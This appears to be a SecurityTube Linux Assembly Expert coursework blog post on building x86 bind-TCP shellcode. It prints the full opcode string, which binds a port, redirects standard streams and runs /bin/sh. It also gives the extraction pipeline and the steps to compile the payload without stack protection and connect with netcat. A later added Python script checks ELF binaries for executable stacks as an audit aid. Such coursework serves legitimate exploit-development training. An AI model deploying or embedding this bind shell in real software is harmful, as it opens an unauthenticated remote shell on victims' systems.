- Assignment1.nasm
- compile.sh
- shconfig.py
- shellcode.c
In this assignment, I implemented the socketcall() system call in assembly and redirected STDIN, STDOUT, and STDERR to the resulting socket. Using some cut and trim magic learned via commandlinefu, the opcodes were extracted and pasted into the shconfig.py program, which the user runs with an argument that specifies the port to use. Its output is then placed into the shellcode.c skeleton program, which is compiled without stack protection and with an executable stack.
Here’s the trim command to extract the opcodes:
objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Step 1: Compile Assignment1.nasm
Step 2: Extract the opcodes
Run shconfig.py -p <port number of choice>
./shconfig.py -p 1337 Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1 \xcd\x80\x31\xff\x97\x6a\x66\x58\x6a\x02\x5b\x31\xc9\x51\x66\x68\x53\x9 \x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x31\xc9 \x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x57\x89\xe1\xcd \x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xc9\x51 \x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";
Insert that output into the code[] variable of the skeleton C program.
Compile with:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
Run it, then connect from another terminal with netcat on the port you specified with shconfig.py, and you’re in!
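Because the skeleton is built with `-z execstack`, the resulting binary carries a PT_GNU_STACK program header with the execute bit set, which is exactly what a hardening audit looks for. The following added example (not part of the original post or its scripts) reads that header directly from the ELF program headers; the ELF images it tests against are constructed inline rather than taken from the page.

```python
"""Report whether an ELF binary asks the loader for an executable stack.

gcc -z execstack sets PF_X on the PT_GNU_STACK program header; a header
without PF_X requests a non-executable stack, and a missing header falls
back to the legacy executable-stack default on x86.
"""
import struct
import sys

PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def stack_is_executable(elf: bytes) -> bool:
    """Parse the ELF32/ELF64 header and program headers of `elf`."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64 = elf[4] == 2            # EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64
    end = "<" if elf[5] == 1 else ">"  # EI_DATA: 1 = little-endian
    if is_64:
        phoff = struct.unpack_from(end + "Q", elf, 0x20)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 0x36)
    else:
        phoff = struct.unpack_from(end + "I", elf, 0x1C)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 0x2A)
    for i in range(phnum):
        off = phoff + i * phentsize
        if is_64:  # Elf64_Phdr: p_type, p_flags come first
            p_type, p_flags = struct.unpack_from(end + "II", elf, off)
        else:      # Elf32_Phdr: p_flags sits at offset 24
            p_type = struct.unpack_from(end + "I", elf, off)[0]
            p_flags = struct.unpack_from(end + "I", elf, off + 24)[0]
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True  # no PT_GNU_STACK header: loader defaults to executable


def build_elf32_sample(stack_flags: int) -> bytes:
    """Constructed minimal little-endian ELF32 image (header plus a single
    PT_GNU_STACK program header) for offline testing; not a runnable binary."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000,
                               52, 0, 0, 52, 32, 1, 40, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit a real binary, e.g. ./shellcode
        print(sys.argv[1], "executable stack:", stack_is_executable(open(sys.argv[1], "rb").read()))
    for label, flags in (("noexecstack", PF_R | PF_W), ("-z execstack", PF_R | PF_W | PF_X)):
        print(f"{label}: executable stack = {stack_is_executable(build_elf32_sample(flags))}")
```

Run without arguments to see both constructed cases; pass a path to check a binary you built, such as the skeleton compiled above.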
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-860